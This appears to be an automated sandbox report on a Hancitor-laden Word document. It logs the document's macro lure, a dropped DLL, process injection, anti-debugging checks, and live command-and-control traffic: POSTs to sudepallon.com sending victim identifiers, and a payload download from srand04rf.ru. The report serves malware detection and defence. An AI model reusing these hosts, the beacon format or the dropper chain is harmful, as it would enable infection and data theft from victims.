Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_021128D0 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 3_2_021128D0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE9CCB3-349E-46EF-BF24-C3A751787722}.tmp
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /7hfjsdfjks.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: srand04rf.ru
Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /?format=xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: api.ipify.org
Connection: Keep-Alive
Source: svchost.exe, 00000005.00000002.2168632180.000000000066D000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: svchost.exe, 00000005.00000002.2168632180.000000000066D000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: unknown DNS traffic detected: queries for: api.ipify.org
Source: unknown HTTP traffic detected: POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 105
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 30 2e 30 2e 30 2e 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=0.0.0.0&TYPE=1&WIN=6.1(x64)
Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmp String found in binary or memory: http://anspossthrly.ru/8/forum.php
Source: rundll32.exe String found in binary or memory: http://api.ipify.org
Source: svchost.exe, 00000005.00000002.2168568117.0000000000624000.00000004.00000020.sdmp String found in binary or memory: http://api.ipify.org/?format=xml
Source: rundll32.exe, 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2346967609.0000000003240000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.2169398406.00000000035D0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmp String found in binary or memory: http://sudepallon.com/8/forum.php
Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmp String found in binary or memory: http://thentabecon.ru/8/forum.php
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2346967609.0000000003240000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.2169398406.00000000035D0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Malicious sample detected (through community Yara rule)
Source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0 Screenshot OCR: Enable content button from the yellow bar above
Source: Document image extraction number: 1 Screenshot OCR: Enable editing txjtton from the yellow bar above 0= you have enabled eclmng. please click Engble
Source: Screenshot number: 12 Screenshot OCR: Enable editing txjtton from the yellow bar above Once you have enabled edmng. please cHck Enable
Source: Screenshot number: 12 Screenshot OCR: Enable content button from the yellow bar above a S
Document contains OLE streams with PE executables
Source: 0708_3355614568218.doc Stream path 'ObjectPool/_1687137834/\x1Ole10Native' : MZ signature found
Document contains an embedded VBA macro which may execute processes
Source: 0708_3355614568218.doc OLE, VBA macro line: Private Declare PtrSafe Function gc Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Document contains an embedded VBA macro with suspicious strings
Source: 0708_3355614568218.doc OLE, VBA macro line: Private Declare PtrSafe Function gc Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\nimb.dll
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to communicate with device drivers
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_004293B0: GetFileInformationByHandle,DeviceIoControl, 5_2_004293B0
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 0708_3355614568218.doc OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open Name: Document_Open
Document contains embedded VBA macros
Source: 0708_3355614568218.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0212FEF0 appears 51 times
Yara signature match
Source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@7/14@7/5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,inet_ntoa, 5_2_00415800
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$08_3355614568218.doc
Source: C:\Windows\SysWOW64\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC438.tmp
Source: 0708_3355614568218.doc OLE indicator, Word Document stream: true
Source: 0708_3355614568218.doc OLE document summary: title field not present or empty
Source: 0708_3355614568218.doc OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 0708_3355614568218.doc Virustotal: Detection: 37%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.2346397243.000000000213D000.00000002.00020000.sdmp, 0708_3355614568218.doc

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02113580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 3_2_02113580
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0211CB68 push ebp; iretd 3_2_0211CB6C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0211E006 push ds; ret 3_2_0211E01F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0213C024 push ds; retf 3_2_0213C025
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0211D829 push ebp; ret 3_2_0211D844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0211E8BF push esp; iretd 3_2_0211E8C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0212B8E9 push ecx; ret 3_2_0212B8FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0211A964 push edi; ret 3_2_0211A9B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0212FF35 push ecx; ret 3_2_0212FF48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0211CCC8 push ecx; ret 3_2_0211CCC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0211A55A push eax; ret 3_2_0211A56E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0214F2CF push edx; ret 3_2_0214F2D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02150903 push ecx; retf 3_2_02150904
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0214D561 push eax; ret 3_2_0214D591
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0214D5E0 push eax; ret 3_2_0214D591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00435E20 push dword ptr [eax+04h]; ret 5_2_00435E4F

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\nimb.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: 0708_3355614568218.doc Stream path 'Data' entropy: 7.97264179911 (max. 8.0)

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\svchost.exe TID: 2976 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02113400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 3_2_02113400
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0212B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0212B328
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02113580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 3_2_02113580
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0214E556 mov eax, dword ptr fs:[00000030h] 3_2_0214E556
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0214E485 mov eax, dword ptr fs:[00000030h] 3_2_0214E485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0214E08C push dword ptr fs:[00000030h] 3_2_0214E08C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02111390 GetProcessHeap,RtlAllocateHeap, 3_2_02111390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0212B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0212B328
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02129B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_02129B44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0212E1A8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0212E1A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02133668 SetUnhandledExceptionFilter,__encode_pointer, 3_2_02133668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0213368A __decode_pointer,SetUnhandledExceptionFilter, 3_2_0213368A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0040115C SetUnhandledExceptionFilter,exit, 5_2_0040115C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00401150 SetUnhandledExceptionFilter, 5_2_00401150
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_004013C9 SetUnhandledExceptionFilter, 5_2_004013C9

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe Domain query: pospvisis.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 50.19.92.227 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 77.222.42.67 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 8.211.241.0 80
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: sudepallon.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: srand04rf.ru
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 23.21.211.162 80
Source: C:\Windows\SysWOW64\svchost.exe Domain query: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 95.213.179.67 80
Contains functionality to inject threads in other processes
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02113880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle, 3_2_02113880
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02138BC2 cpuid 3_2_02138BC2
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s, 3_2_021319B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 3_2_0212D3FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA, 3_2_02139827
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 3_2_02131852
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_02131911
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_02131976
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 3_2_02139964
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 3_2_02131610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 3_2_0213660A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 3_2_021306AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat, 3_2_021397EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 3_2_02131498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA, 3_2_021364A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 3_2_02130D07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoA, 3_2_0213157A
Source: C:\Windows\SysWOW64\svchost.exe Code function: CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,inet_ntoa, 5_2_00415800
